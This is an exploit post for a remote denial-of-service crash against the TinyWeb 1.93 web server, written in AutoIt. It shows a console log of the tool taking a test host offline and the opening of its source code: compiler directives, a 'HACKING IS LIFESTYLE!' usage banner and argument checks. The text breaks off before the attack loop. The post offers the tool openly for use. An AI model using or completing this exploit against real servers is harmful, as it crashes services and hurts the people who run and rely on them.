TinyWeb/1.93 Denial Of Service (Remote Crash) exploit;
This is simple exploit written in AutoIT that crashes Remote/Local TinyWeb/1.93 web server.
If you want to use exploit then you've to compile it as CUI application.
Official site of TinyWeb: => http://www.ritlabs.com/en/products/tinyweb/
/AkaStep
(Local Testing)
OS on both machines : XP SP2 (ru) 32 bit
D:\programming1\tinyweb>dos.exe --help
##############################################################
########## TinyWeb/1.93 DENIAL OF SERVICE exploit ##########
########## Usage: dos.exe REMOTEIP REMOTEPORT ##########
\\\\\\\\\\ HACKING IS LIFESTYLE! //////////
##############################################################
D:\programming1\tinyweb>dos.exe 192.168.0.15 89
##############################################################
########## TinyWeb/1.93 DENIAL OF SERVICE exploit ##########
########## Usage: dos.exe REMOTEIP REMOTEPORT ##########
\\\\\\\\\\ HACKING IS LIFESTYLE! //////////
##############################################################
################ WORKING ON IT! PLEASE WAIT...################
--------------------------------------------------------------
~ TRY count: ~ 400
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 800
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 1200
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 1600
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 2000
--------------------------------------------------------------
##############################################################
########## Mission Complete! ##########
TARGET =>http://192.168.0.15:89/ is * DOWN ! *
##############################################################
D:\programming1\tinyweb>telnet 192.168.0.15 89
Подключение к 192.168.0.15...Не удалось открыть подключение к этому узлу, на порт 89: Сбой подключения
D:\programming1\tinyweb>ping 192.168.0.15
Обмен пакетами с 192.168.0.15 по 32 байт:
Ответ от 192.168.0.15: число байт=32 время<1мс TTL=128
Ответ от 192.168.0.15: число байт=32 время<1мс TTL=128
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <String.au3>
$f=_StringRepeat('#',10);
$USE_PROTO='HTTP://';
$INVALIDIP='INVALID IP FORMAT';
$INVALIDPORT='INVALID PORT NUMBER!';
$HTTPUA='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage=$f & ' TinyWeb/1.93 DENIAL OF SERVICE exploit ' & $f & @CRLF & _
$f & " Usage: " & _
@ScriptName & ' REMOTEIP ' & ' REMOTEPORT ' & $f & @CRLF & _
StringReplace($f,'#','\') & _StringRepeat(' ',10) & _
'HACKING IS LIFESTYLE!' & _StringRepeat(' ',10) & StringReplace($f,'#','/')
if $CmdLine[0]=0 Then
MsgBox(64,"","This is a console Application!" & @CRLF & 'More Info: ' & @ScriptName & ' --help' & @CRLF & _
'Invoke It from MSDOS!',5)
exit;
EndIf
if $CmdLine[0] <> 2 Then
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
exit;
EndIf